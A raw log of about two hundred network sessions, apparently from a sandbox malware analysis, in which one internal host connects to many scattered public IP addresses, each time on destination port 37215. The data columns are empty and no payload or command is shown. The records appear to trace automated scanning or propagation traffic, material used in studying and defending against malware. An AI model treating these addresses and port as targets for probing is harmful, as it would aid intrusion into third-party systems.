                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12641192.168.2.235528641.86.189.3137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12642192.168.2.2335804157.154.61.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12643192.168.2.2355316157.224.120.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12644192.168.2.235634641.140.159.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12645192.168.2.234699841.232.173.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12646192.168.2.2340790200.119.33.18937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12647192.168.2.2334266157.212.219.1837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12648192.168.2.2343338157.49.131.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12649192.168.2.2346020157.105.80.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12650192.168.2.2341800157.113.218.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12651192.168.2.235439641.213.167.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12652192.168.2.234944858.78.38.8037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12653192.168.2.2333990157.219.193.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12654192.168.2.2339140157.178.40.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12655192.168.2.234062064.101.80.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12656192.168.2.2343972157.112.40.4537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12657192.168.2.2348756209.7.47.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12658192.168.2.2333216197.66.246.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12659192.168.2.235482665.149.230.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12660192.168.2.233756449.164.158.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12661192.168.2.2336742157.72.190.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12662192.168.2.2352302213.15.78.10337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12663192.168.2.2354494142.167.61.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12664192.168.2.235716641.190.212.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12665192.168.2.233374841.46.79.6537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12666192.168.2.2348812197.132.207.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12667192.168.2.2357840197.163.218.1637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12668192.168.2.234410641.11.15.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12669192.168.2.235726041.29.195.19737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12670192.168.2.235704641.53.66.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12671192.168.2.2352710107.47.234.4537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12672192.168.2.235544641.124.25.4737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12673192.168.2.235632641.8.44.7937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12674192.168.2.2344314157.66.114.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12675192.168.2.2342504197.250.186.4537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12676192.168.2.234172241.162.0.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12677192.168.2.2358966157.128.254.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12678192.168.2.2339186157.12.75.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12679192.168.2.2346836157.242.223.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12680192.168.2.234092441.206.206.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12681192.168.2.2338244197.212.23.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12682192.168.2.234797841.233.11.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12683192.168.2.2353548197.29.234.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12684192.168.2.2352224157.201.226.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12685192.168.2.2333862197.59.222.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12686192.168.2.2356718197.0.218.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12687192.168.2.2359846197.35.22.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12688192.168.2.2352272157.107.123.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12689192.168.2.2347158197.132.166.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12690192.168.2.233854027.39.248.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12691192.168.2.2355114157.120.24.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12692192.168.2.2340026104.217.129.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12693192.168.2.2352440197.128.250.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12694192.168.2.2345766197.74.169.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12695192.168.2.2350080157.216.34.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12696192.168.2.2358244197.44.34.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12697192.168.2.235031841.135.114.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12698192.168.2.2334712157.23.87.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12699192.168.2.2343602157.212.250.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12700192.168.2.233885841.24.183.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12701192.168.2.235048841.101.206.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12702192.168.2.2345104197.110.236.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12703192.168.2.2353940157.93.212.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12704192.168.2.235459885.140.211.12637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12705192.168.2.2338570157.9.149.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12706192.168.2.2335158197.186.18.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12707192.168.2.2345022157.18.144.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12708192.168.2.2345648197.23.181.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12709192.168.2.2333880157.48.62.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12710192.168.2.2338110197.196.66.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12711192.168.2.2333586157.210.54.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12712192.168.2.2355472157.85.28.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12713192.168.2.234143241.52.30.17337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12714192.168.2.2346932137.34.140.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12715192.168.2.2335660157.185.119.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12716192.168.2.2349916197.219.129.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12717192.168.2.2337098197.60.25.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12718192.168.2.2358626175.171.47.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12719192.168.2.235117663.39.165.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12720192.168.2.2342148157.13.3.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12721192.168.2.233739635.88.164.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12722192.168.2.233466441.100.176.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12723192.168.2.2334792157.11.99.7937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12724192.168.2.234166241.181.17.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12725192.168.2.2357074197.170.168.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12726192.168.2.2341800136.83.176.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12727192.168.2.2335096157.254.61.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12728192.168.2.2337610157.4.186.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12729192.168.2.2352938101.130.108.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12730192.168.2.233403641.154.251.21437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12731192.168.2.236000272.163.241.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12732192.168.2.234333841.246.56.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12733192.168.2.234483241.59.96.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12734192.168.2.2341162197.144.64.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12735192.168.2.2345236197.107.101.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12736192.168.2.2337720197.206.236.12337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12737192.168.2.2346812157.104.148.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12738192.168.2.2350776157.139.225.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12739192.168.2.2342704157.70.106.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12740192.168.2.2350354157.69.154.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12741192.168.2.2346482197.233.26.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12742192.168.2.2341430157.140.147.18737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12743192.168.2.2345498157.172.176.4737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12744192.168.2.234896041.130.141.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12745192.168.2.235641241.61.142.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12746192.168.2.234478641.163.158.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12747192.168.2.2347426197.171.11.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12748192.168.2.2342310102.204.236.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12749192.168.2.2338644213.158.17.16637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12750192.168.2.2353830197.243.203.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12751192.168.2.2351432197.15.199.9237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12752192.168.2.2354268157.91.31.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12753192.168.2.2350996124.188.166.18737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12754192.168.2.2346370157.222.101.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12755192.168.2.233722841.165.83.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12756192.168.2.235671641.244.44.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12757192.168.2.2356092197.25.219.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12758192.168.2.2355948157.83.228.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12759192.168.2.2360458197.231.157.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12760192.168.2.2341256197.21.80.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12761192.168.2.2343322157.205.215.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12762192.168.2.2350456197.189.74.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12763192.168.2.2340156157.198.7.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12764192.168.2.2359174157.79.31.937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12765192.168.2.2338274197.250.248.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12766192.168.2.2356006119.126.22.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12767192.168.2.2340224157.41.144.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12768192.168.2.234589841.4.160.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12769192.168.2.233900641.202.51.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12770192.168.2.2346512157.176.3.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12771192.168.2.2342418197.23.163.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12772192.168.2.2339594157.49.163.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12773192.168.2.2350092221.226.147.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12774192.168.2.234129241.93.168.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12775192.168.2.2351882157.120.56.7937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12776192.168.2.2337610157.54.110.8137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12777192.168.2.2343632197.170.240.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12778192.168.2.2339962197.235.28.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12779192.168.2.2334542197.208.88.3137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12780192.168.2.2349590120.142.68.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12781192.168.2.2341482197.112.5.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12782192.168.2.2351190157.122.127.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12783192.168.2.2346336205.39.38.1637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12784192.168.2.2348860197.67.229.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12785192.168.2.2355298149.180.22.16337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12786192.168.2.2354818157.210.176.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12787192.168.2.233979441.111.157.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12788192.168.2.2341386157.191.33.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12789192.168.2.2357204157.0.209.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12790192.168.2.2349262157.70.101.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12791192.168.2.235201841.122.107.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12792192.168.2.233793890.229.100.2737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12793192.168.2.233883841.168.196.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12794192.168.2.235952641.205.42.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12795192.168.2.236009441.1.95.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12796192.168.2.235232671.134.220.24137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12797192.168.2.234930286.188.70.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12798192.168.2.2342090182.96.220.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12799192.168.2.235170261.196.131.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12800192.168.2.2344666135.170.205.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12801192.168.2.234477641.142.88.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12802192.168.2.2347862157.74.190.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12803192.168.2.2344698197.203.7.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12804192.168.2.234729041.14.206.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12805192.168.2.235946241.184.171.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12806192.168.2.2348952186.211.202.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12807192.168.2.2355828134.159.192.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12808192.168.2.2360640197.131.160.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12809192.168.2.236011649.125.153.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12810192.168.2.2358356157.61.233.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12811192.168.2.233552241.178.84.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12812192.168.2.235038441.194.41.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12813192.168.2.2340846157.178.163.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12814192.168.2.2344246176.246.4.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12815192.168.2.2347844197.33.3.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12816192.168.2.23390444.53.125.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12817192.168.2.2358474157.208.224.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12818192.168.2.2357974197.252.194.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12819192.168.2.2350054157.86.184.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12820192.168.2.2346216157.8.42.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12821192.168.2.2336784196.135.115.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12822192.168.2.235190441.25.18.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12823192.168.2.2359716201.190.114.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12824192.168.2.234631441.121.229.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12825192.168.2.2347402157.126.169.22437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12826192.168.2.2343596197.32.150.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12827192.168.2.2334708180.218.108.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12828192.168.2.2350736157.218.24.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12829192.168.2.2349274197.150.229.10337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12830192.168.2.23538449.182.254.8137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12831192.168.2.2333726157.65.158.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12832192.168.2.2353296134.69.42.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12833192.168.2.234153641.203.179.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12834192.168.2.2336752197.56.168.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12835192.168.2.2358198197.138.15.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12836192.168.2.2360228157.242.72.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12837192.168.2.235479841.188.160.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12838192.168.2.2341330152.171.182.1837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12839192.168.2.2337956197.164.63.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12840192.168.2.235206441.224.225.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12841192.168.2.2354028197.36.112.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12842192.168.2.2342330197.248.71.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12843192.168.2.233726041.4.173.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12844192.168.2.2349808197.180.185.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12845192.168.2.233485088.203.103.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12846192.168.2.235908641.2.183.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12847192.168.2.234026041.189.123.6237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12848192.168.2.2349260157.215.23.7937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12849192.168.2.2351308157.29.56.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12850192.168.2.2352666172.209.238.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12851192.168.2.235977841.13.236.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12852192.168.2.2337618197.218.80.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12853192.168.2.2352066197.78.172.14537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12854192.168.2.2337342157.103.245.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12855192.168.2.2343692134.246.9.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12856192.168.2.2340066197.6.198.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12857192.168.2.235652038.94.185.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12858192.168.2.2337352212.114.23.15537215
                                          TimestampBytes transferredDirectionData


